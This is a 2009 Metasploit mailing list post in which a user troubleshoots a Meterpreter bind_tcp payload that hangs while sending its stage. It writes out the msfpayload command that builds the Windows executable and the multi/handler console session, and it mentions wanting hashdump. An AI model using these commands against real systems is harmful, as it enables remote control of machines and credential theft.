Metasploit mailing list archives

Meterpreter not working at Metasploit Framework 3.3.1?


From: Richard Miles <richard.k.miles () googlemail com>
Date: Wed, 9 Dec 2009 19:23:17 -0600

Hi

I downloaded Metasploit Framework 3.3.1
(http://www.metasploit.com/releases/framework-3.3.1-linux-i686.run), I
installed it without problems. So created a meterpreter executable
like this ./msfpayload windows/meterpreter/bind_tcp LPORT=4433 X >
mymeterpreter.exe

I uploaded and executed mymeterpreter.exe at my target.

On my box, I did:

msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 461 exploits - 222 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7791 updated today (2009.12.09)

msf > use exploit/multi/handler
d_tcpxploit(handler) > set PAYLOAD windows/meterpreter/bin
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4433
LPORT => 4433
msf exploit(handler) > set RHOST 10.10.1.4
RHOST => 10.10.1.4
msf exploit(handler) > exploit
[*] Started bind handler

[*] Starting the payload handler...
[*] Sending stage (722944 bytes)

And it stop in this screen forever, I'm waiting for more than 30
minutes. For sure it's not normal. With old release from framework 3 I
did the same and it worked, but it was useless because there was no
hashdump and other cool stuff that I want to use.

Any idea?

Thanks
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: